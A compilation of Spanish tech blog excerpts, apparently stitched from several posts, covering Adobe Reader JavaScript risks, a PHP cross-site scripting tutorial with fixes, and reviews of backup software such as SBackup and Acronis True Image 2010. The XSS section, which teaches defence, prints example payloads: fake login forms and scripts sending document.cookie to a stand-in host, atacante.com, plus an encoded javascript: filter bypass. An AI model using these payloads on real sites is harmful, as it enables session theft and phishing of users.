Muchas de estas vulnerabilidades se aprovechan de la capacidad de Adobe Reader de ejecutar código JavaScript, por lo os recomendaría desactivarlo inmediatamente desmarcando la casilla “Activar JavaScript para Acrobat” en Edición -> Preferencias -> JavaScript. Igualmente, sería recomendable desactivar la visión de PDF desde el navegador.

También podéis probar un lector de PDF alternativo, como Sumatra PDF. U otro sistema operativo.

Cross-Site Scripting, el problema

Veamos un pequeño ejemplo. Supongamos que escribimos un sencillo script en PHP que no hace más que mostrar el valor de una variable mensaje pasada por GET. Algo tan sencillo como esto:

<?php
  echo $_GET['mensaje'];
?>

Como no tratamos la entrada del usuario de ninguna forma, dejamos la puerta abierta a que se muestre cualquier tipo de código HTML en nuestra página, incluido, por ejemplo, un formulario de login falso, o un iframe con un formulario falso:

http://localhost/index.php?mensaje=<form action="http://atacante.com/captura.php">Usuario: <input type="text" name="usuario"/><br/>Contraseña: <input type="text" name="pass"/></form>

un script que use document.location para hacer que el usuario ejecute un archivo PHP de la web del atacante, pasándole las cookies:

http://localhost/index.php?mensaje=<script>document.location='http://atacante.com/captura.php?cookies='+document.cookie</script>

o una imagen transparente de 1×1 del servidor del atacante, pasándole a la URL el valor de las cookies, lo cuál sería bastante difícil de detectar, a menos que el usuario se fijara en el código:

http://localhost/mensajes.php?mensaje=<script>document.write("<img widht='0' height='0' src='http://atacante.com/img.png?valores="+document.cookie'>")</script>

El tipo de vulnerabilidad XSS que sufre nuestra pequeña página de ejemplo se conoce como “XSS no persistente”, porque no se modifica la web original. El atacante debe conseguir que un usuario de la web haga clic sobre uno de sus enlaces especialmente formados, por ejemplo, ocultándolo con un acortador de URLs.

Las vulnerabilidades de XSS persistente son mucho más peligrosas. Esta se da cuando se almacenan los datos introducidos por los usuarios, en una base de datos, por ejemplo, y estos, a su vez, se muestran a otros usuarios. Esto sucede, por ejemplo, en blogs y foros con los comentarios y las respuestas de los hilos. En estos casos bastaría con que el usuario visitara la página vulnerable para que se ejecutara el código del atacante.

Cross-Site Scripting, la solución

La solución pasa por filtrar todos los datos que mostremos en la aplicación y que procedan del usuario, no sólo datos introducidos en un formulario o parámetros en la URL, sino también cosas como cabeceras HTTP o cookies. En PHP podemos utilizar para esto la función htmlspecialchars, que convierte los caracteres ", <, > y & a las entidades HTML correspondientes.

En contadas ocasiones también puede interesarnos pasar como segundo parámetro a la función la constante ENT_QUOTES, para sustituir las comillas simples (') además de los caracteres anteriores. En el siguiente código, por ejemplo, al haber utilizado comillas simples para encerrar el valor del atributo, tendríamos que convertir estos caracteres para que el usuario no pudiera salir de este contexto:

<?php
  $aspecto = $_GET['aspecto'];
  echo "<div class='{$aspecto}'>...</div>";
?>

También es importante especificar el juego de caracteres del documento, bien a través de la etiqueta meta, o bien usando la cabecera HTTP correspondiente. De otra forma el atacante podría utilizar texto en UTF-7, que codifica los símbolos < y >, entre otros, con lo que htmlspecialchars no los reemplazaría. Bastaría entonces engañar al navegador para hacerle pensar que UTF-7 es la verdadera codificación del archivo, por ejemplo con un iframe con texto UTF-7, para que se lanzara el ataque.

Por último hay muchos casos en los que htmlspecialchars no nos será de ninguna utilidad, y donde será necesario estar muy atentos y aplicar el sentido común. Un ejemplo son los atributos donde se puede utilizar la directiva javascript:

<?php
  $enlace = $_GET['enlace'];
  // Peligro: index.php?enlace=javascript:alert(document.cookie)
  echo "<a href='{$enlace}'>Enlace</a>";
?>

En estas situaciones tampoco bastaría con filtrar el texto “javascript:” ya que la cadena se puede manipular de distintas formas para burlar el filtrado. Se podría utilizar, por ejemplo, los caracteres de la codificación de URLs, sustituyendo la j por %6A:

http://localhost/pagina.php?enlace=%6Aavascript:alert(document.cookie)

También existen técnicas mucho menos conocidas, como el uso de la etiqueta y el atributo style mediante la propiedad expression de IE, o la palabra reservada url.

Para todos estos casos menos comunes lo mejor es no intentar reinventar la rueda y utilizar una librería especialmente pensada para lidiar con vulnerabilidades de XSS, como HTML Purifier.

Por último, una forma de mitigar hasta cierto punto las posibles vulnerabilidades XSS que podamos haber pasado por alto sería poner la opción session.cookie_httponly a true en php.ini, de forma que al crear las cookies se añada por defecto este flag, que indica a los navegadores que lo soportan que no se debe permitir el acceso a las cookies a través de scripting.

Yo, por mi parte, he echado mano de Illustrator para crear una pequeña infografía con los datos más interesantes, y con algunas recomendaciones para que nuestras contraseñas sean más seguras.

• Icono: DaPino-Colada. Licencia Creative Commons Attribution 3.0.
• Fuentes: Arial y Museo 700.

Y tú, ¿sueles cumplir con estos consejos?

Esta aplicación, desarrollada utilizando Python y PyGTK, se mantiene en segundo plano, y se encarga de tomar instantáneas cada cierto tiempo de las carpetas y archivos que hayamos indicado, de forma que podamos recuperar estos si los perdemos por accidente, utilizando una interfaz en la que nos podemos “mover en el tiempo” por fecha y hora.

La aplicación es bastante sencilla de utilizar, y el consumo de recursos es mínimo, aunque, para qué nos vamos a engañar, su interfaz se encuentra a años luz de la de la aplicación de Apple.

SBackup es un programa muy sencillo de utilizar, aunque cuenta con menos opciones que Acronis True Image, por ejemplo. Una vez instalado, podemos lanzarlo desde Sistema -> Administración -> Simple Backup Config, tras lo cuál nos encontraremos con una interfaz parecida a la siguiente.

Lo primero que tenemos que hacer es decidir si queremos que la aplicación realice copias de seguridad automáticamente cada cierto tiempo, usando cron, o bien queremos crear nuestras copias de seguridad manualmente, en cuyo caso tendremos que seleccionar la última opción.

Si preferimos que se lleven a cabo copias de seguridad cada cierto tiempo, de nuevo tenemos dos opciones: podemos usar la configuración por defecto del programa, que consiste en realizar copias de seguridad incrementales diarias y copias de seguridad completas semanales de los directorios /home, /var, /usr/local y /etc; o podemos personalizar la forma en que trabajará la aplicación utilizando los ajustes del resto de pestañas.

Entre las opciones que podemos configurar encontramos los directorios a respaldar en la copia de seguridad, archivos a excluir, el directorio o servidor en el que guardar la copia de seguridad y la frecuencia con la que generaremos las copias de seguridad.

En todo caso, seleccionemos la opción que seleccionemos, una vez hayamos configurado todo, para realizar nuestra copia de seguridad bastará pulsar sobre el botón “Generar copia de respaldo ahora”. Como veis, tremendamente sencillo.

Al instalar el programa este crea un par de accesos directos en el escritorio: “Acronis True Image Home 2010″, la aplicación en sí, y “Acronis One-Click Backup”, una herramienta pensada, como su nombre indica, para lograr con un clic lo que ya era sencillo: al hacer doble clic sobre su icono la aplicación creará una copia de seguridad de la partición de sistema y el MBR, y la guardará en la ubicación que considere oportuna.

Como a nosotros se nos supone usuarios avanzados, veamos lo que nos ofrece la herramienta principal. Al lanzar Acronis True Image Home 2010 por primera vez, veremos una ventana con distintas opciones ordenadas por categorías en una barra lateral.

A saber:

• Crear copia de seguridad, donde podemos
  • crear una copia de seguridad de las particiones o discos que queramos (soporta distintos tipos de particiones, no solo las típicas de Windows, como FAT16, FAT32 y NTFS, sino otras como Ext3 o ReiserFS)
  • Utilizar los servidores de Acronis para alojar nuestras copias de seguridad
  • Realizar una copia de seguridad de determinados archivos y carpetas
  • O realizar una copia de seguridad continua, la herramienta Acronis Nonstop Backup que ya explicamos que recordaba al Time Machine de Mac OS X
• Recuperación, para recuperar datos desde nuestras copias de seguridad de discos o de archivos
• Tareas y registro, desde la que podemos programar la ejecución de distintas copias de seguridad y ver un registro de las acciones llevadas a cabo
• Try & Decide, que funciona a modo de sandbox y nos permite ejecutar software no seguro o visitar webs no fiables sin poner en riesgo nuestro equipo
• y Herramientas & utilidades, desde donde podemos crear un disco de rescate, clonar las particiones de un disco a otro, destruir archivos de forma que no puedan recuperarse, montar una imagen como si fuera un disco, etc.

La opción que utilizarán la mayoría de los usuarios es la de realizar una copia de seguridad de algunos archivos en concreto (Crear copia de seguridad -> Copia de seguridad de archivos -> Mis datos). Al seleccionar esta utilidad se muestra un asistente que nos va guiando por los distintos pasos necesarios para crear nuestra copia de seguridad, el primero de los cuales, por supuesto, es seleccionar nuestros archivos, en una vista similar a la del explorador de Windows.

Le sigue la opción de crear una copia de seguridad nueva, o actualizar una copia de seguridad existente.

Por último, tenemos varios pasos opcionales como la opción de programar el proceso seleccionado cada cierto tiempo, el método a utilizar (copia completa, incremental o diferencial), archivos a excluir, cifrado de la copia de seguridad resultante, etc.

Una vez hechas las modificaciones que consideremos oportunas, basta pulsar sobre el botón Continuar para que comience el proceso de la creación de la copia de seguridad.

Esta herramienta, que es toda una veterana en su campo, y que es compatible ahora con Windows 7, ofrece entre sus principales novedades una nueva característica bautizada como “Acronis Nonstop Backup”, la cuál permite crear copias de seguridad incrementales cada cinco minutos, de forma que los usuarios puedan devolver su sistema a cualquier momento del pasado, de una forma que recuerda a “Time Machine” de Mac OS X, hasta el punto de que la herramienta de recuperación se llama “Time Explorer”.

El resto de novedades son igual de interesantes. Desde el soporte para el formato Virtual HD (vhd) de Microsoft Virtual PC, lo que permite convertir imágenes de True Image a este formato y ejecutarlas en el emulador de Microsoft; a la mejora en la interfaz, gracias a la cuál, crear nuestras copias de seguridad es más rápido y sencillo que nunca.

Por supuesto, a parte de las novedades, Acronis True Image también incluye todas las características a las que el programa nos tiene acostumbrados, como la clonación de discos, el cifrado de copias de seguridad, el destructor de archivos o el soporte de almacenamiento en dispositivos en red y servidores FTP.

Todo esto, en conjunto, resulta en la que es, en mi opinión, la mejor versión de Acronis True Image hasta la fecha: muy completa y funcional, sencilla, con un buen rendimiento… Muy recomendable si tenéis datos que salvaguardar y no os importa recurrir a una opción de pago (la herramienta se puede adquirir en su web a un precio de 49,95€). Aquellos que queráis probarla por vosotros mismos, podéis descargar una demo de 30 días de este software de copias de seguridad desde su página web (111MB).

“Snow Leopard es más seguro que Leopard, pero no es tan seguro como Vista o Windows 7. (..) Cuando Apple implemente ambas características [ASLR y DEP], entonces dejaré de quejarme de la seguridad de Apple.”

¿Cómo lo veis vosotros?

De paso, también te recomiendo leer la entrada Asegurar una red wifi. O puedes dejar tu red abierta para que la use todo el mundo…